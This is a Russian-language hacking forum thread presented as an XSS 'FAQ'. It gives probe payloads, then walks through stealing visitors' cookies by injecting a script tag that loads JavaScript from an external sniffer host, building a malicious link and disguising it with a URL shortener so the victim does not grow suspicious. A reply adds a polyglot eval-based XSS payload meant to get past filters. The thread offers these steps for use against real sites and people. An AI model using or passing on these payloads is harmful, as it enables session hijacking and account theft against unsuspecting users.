Xss - faq

tickhack

BANNED
Messages
66
Reaction score
12
Points
8
Please note, if you want to make a deal with this user, that it is blocked.
Привет всем я хотел сделать небольшой FAQ по xss ну что начнем

1.Что такое XSS ?

Code:
XSS - Cross Ste Scripting (CSS уже занято Cascade Style Sheets). Уязвимость, возникающая вследствии недостаточной фильтрации вводимых пользователями и в дальнейшем отображаемых на страницах сайта данных. Позволяет разместить непосредственно на страницах сайта произвольный html-код (соответственно, код будет выполняться у всех пользователей, зашедших на страницу).

2.Проверка на уязвимость :
В поиске напишите <fuck> и в исходники поищите слово fuck если "<>" остались это значит то что сайт уязвим если они заменились на что то типа такого :

Code:
<fuck>

то это значит искать xss без полезно но если "<>" остались то можете с улыбкой вбивать ваш скрипт я тут написал чуть-чуть :

Code:
<script>alert()</script> 
"><script>alert()</script> 
'><''>"><script>alert(/XSS/)</script> 
<script>alert('xss')</script> <script>alert('A');</script> 
"><sсriрt>alert(document .cookie)</sсriрt>

Написали ? вышло окно? если да то переходим к 3 шагу.

3.Эксплуатирование XSS :
Эксплуатировать xss вы можете с любого сниффера например https://hacker-pro.net/sniffer/ заходим на сниффер нам нужно будет взять оттуда скрипт для кражи cookies


Взяли скрипт ? он может выглядит вот так :

Code:
%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js></SCRIPT>"

этoт скрипт взят со сниффера hacker-pro.net
например у нас получилась такая ссылка

Code:
http://site.ru/news="><script>alert('xss')</script>

нам надо вставить скрипт для пассивной xss атаки после знака "> и если сайт оставляет куки то куки придут на ваш сниффер вставили? и у нас получится вот такая ссылка

Code:
http://site.ru/news=">%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js></SCRIPT>"

теперь переходим к следующему пункту

4.Шифрование длинных ссылок :

Согласитесь если такую ссылку дать жертве то она заподозрит что тo и мы должны сделать её короткой мы можем зашифровать её с помощью сервиса http://tinyurl.com/ и отправлять жертве и если она перейдет по ссылке то на наш сниффер придут её куки конечно же если сайт оставляет куки) ну что на всё.

Автор :TICKHACK
 
то это значит искать xss без полезно
Не согласен, XSS может быть и среди тега, одними "<>" ничего не решается, достаточно подставить обработчик onload , onerror или начать играться со стилями. Вообще - как сказал Razor, этот вектор уже устарел

javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">[img=1]<img -/style=-=expression&#40/*’/-/*',/**/eval(name)//);width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"

Даст больше шансов "случайно" наткнуться на XSS нежели дефолтное
"><скрипт>алерт()...
 
Top